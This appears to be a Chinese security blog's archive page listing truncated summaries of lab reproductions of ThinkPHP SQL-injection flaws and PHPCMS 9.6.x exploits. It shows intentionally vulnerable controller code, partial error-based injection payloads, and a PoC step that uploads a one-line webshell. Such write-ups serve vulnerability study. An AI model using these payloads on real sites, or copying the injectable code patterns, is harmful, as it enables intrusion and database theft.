07 2021 档案
摘要:漏洞测试代码: public function index() { $column=input('column'); $data=db('users')->max($column); dump($data); } 复现: payload: ?column=id),updatexml(1,concat
阅读全文
摘要:漏洞测试代码: public function index() { $password=input('password/a'); $data = db('users')->where("id",'1')->update(["password"=>$password]); dump($data); }
阅读全文
摘要:控制器代码: public function index(){ $username=I("username"); $order=I("order"); $data=M('users')->where(array('username'=>$username))->order($order)->sele
阅读全文
摘要:控制器代码: public function index(){ $id=I('id'); $res=M('users')->find($id); dump($res); } 复现: payload: id[table]=users where 1 and updatexml(1,concat(0x7
阅读全文
摘要:漏洞代码: public function index(){ $condition['username']=I('username'); $data['password']=I('password'); $res=M('users')->where($condition)->save($data);
阅读全文
摘要:环境: phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影响版本: PHPCMS 9.6.1 复现 1、访问index.php?m=wap&c=index&siteid=1得到加密后的cookie值 2、访问/index.php?m=a
阅读全文
摘要:环境: phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影响版本: PHPCMS 9.6.0 复现: 1、首先访问/index.php?m=wap&c=inde&siteid=1获取cookie 2、访问/index.php?m=att
阅读全文
摘要:环境: phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影响版本: PHPCMS 9.6.0 POC: 首先需要在1.txt中写入一句话木马 siteid=1&modelid=11&username=test&password=1234
阅读全文

浙公网安备 33010602011771号